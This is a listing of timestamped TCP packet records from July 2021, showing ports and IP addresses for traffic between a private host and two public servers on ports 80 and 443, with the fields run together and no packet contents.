                                                                                                                                                                                              Jul 6, 2021 15:07:24.999161959 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.999217033 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:24.999861002 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.999928951 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.000020981 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.000076056 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.000813961 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.000842094 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.000874043 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.000900984 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.001038074 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.001765013 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.001785040 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.001884937 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.002679110 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.002707005 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.002732038 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.002749920 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.002774000 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.003633976 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.003655910 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.003700972 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.003720045 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.004332066 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.004561901 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.004606009 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.004611015 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.004647017 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.005582094 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.005608082 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.005692959 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.006407976 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.006496906 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.006525040 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.006545067 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.006566048 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.036505938 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.036541939 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.036668062 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.036825895 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.036863089 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.037074089 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.037790060 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.037817955 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.037846088 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.037863016 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.039011955 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.039040089 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.039690018 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.039720058 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.040596962 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.040623903 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.041554928 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.041585922 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.045811892 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:25.911362886 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:25.950874090 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.951060057 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:25.958585978 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:25.997432947 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.997642994 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.997674942 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.997690916 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.997731924 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:25.999757051 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.999787092 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.999811888 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.009792089 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.048118114 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.048671007 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.253928900 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.591080904 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.630359888 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.749545097 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.749666929 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.749691010 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.749722004 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.749846935 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.750333071 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.750369072 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.750437021 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.751455069 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.756740093 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.758985043 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.839263916 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.839320898 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.839464903 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.839705944 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.839756012 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.839832067 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.840725899 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.840754986 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.840835094 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.841872931 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.841907978 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.841995001 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.842916965 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.842948914 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.843024015 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.844016075 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.844049931 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.845019102 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.845151901 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.845180988 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.845228910 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.846203089 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.846240997 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.846295118 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.847292900 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.847326994 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.847377062 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.848336935 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.848373890 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.848434925 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.849400997 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.929088116 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.929125071 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.929205894 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.929565907 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.929593086 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.929610968 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.930694103 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.930732012 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.930778027 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.931724072 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.931749105 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.931814909 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.932825089 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.932842970 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.932893038 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.933917046 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.933947086 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.933996916 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.934973955 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.935007095 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.935059071 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.936063051 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.936113119 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.936155081 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.937127113 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.937155962 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.937206030 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.938457012 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.938488960 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.938534021 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.939337969 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.939371109 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.939450979 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.940479994 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.940504074 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.940540075 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.941488981 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.941509008 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.941556931 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.942558050 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.942589998 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.942635059 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.944042921 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.944149017 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.944205999 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.944828987 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.944890022 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.945028067 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.945864916 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.945919991 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.945964098 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.946957111 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.947000027 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.947036982 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.948071003 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.948113918 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.948163986 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:26.949115992 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.949146032 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:26.949187994 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.018810987 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.018841028 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.018923998 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.019263029 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.019325972 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.019370079 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.020327091 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.020365953 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.020401001 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.021414995 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.021442890 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.021481037 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.022536039 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.022568941 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.022608995 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.023643970 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.023674011 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.023710966 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.024704933 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.024739981 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.024780035 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.025789976 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.025827885 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.025871992 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.026917934 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.026952028 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.027012110 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.028089046 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.028114080 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.028166056 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.029340982 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.029357910 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.029402018 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.030109882 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.030137062 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.030179977 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.031198978 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.031214952 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.031255960 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.032336950 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.033040047 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.033091068 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.033380032 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.033509970 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.033556938 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.034486055 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.034504890 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.034552097 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.035583973 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.035602093 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.035645008 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.036650896 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.036674023 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.036730051 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.037723064 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.037740946 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.037779093 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.038827896 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.039598942 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.039659023 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.039936066 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.039962053 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.040008068 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.041043043 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.041073084 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.041117907 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.042145014 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.042175055 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.042218924 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.043200016 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.043226957 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.043270111 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.057348013 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.057388067 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.057447910 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.057806969 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.057835102 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.057893991 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.058855057 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.058885098 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.058948040 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.059948921 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.059978008 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.060048103 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.063101053 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.063152075 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.063222885 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.063725948 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.063752890 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.063828945 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.064774036 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.064798117 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.064891100 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.065339088 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.065978050 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.066426039 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.067086935 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.067174911 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.067517996 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.067550898 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.067569971 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.068612099 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.068629026 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.068669081 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.069724083 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.069746971 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.069777966 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:27.070770979 CEST4434917013.224.92.73192.168.2.22
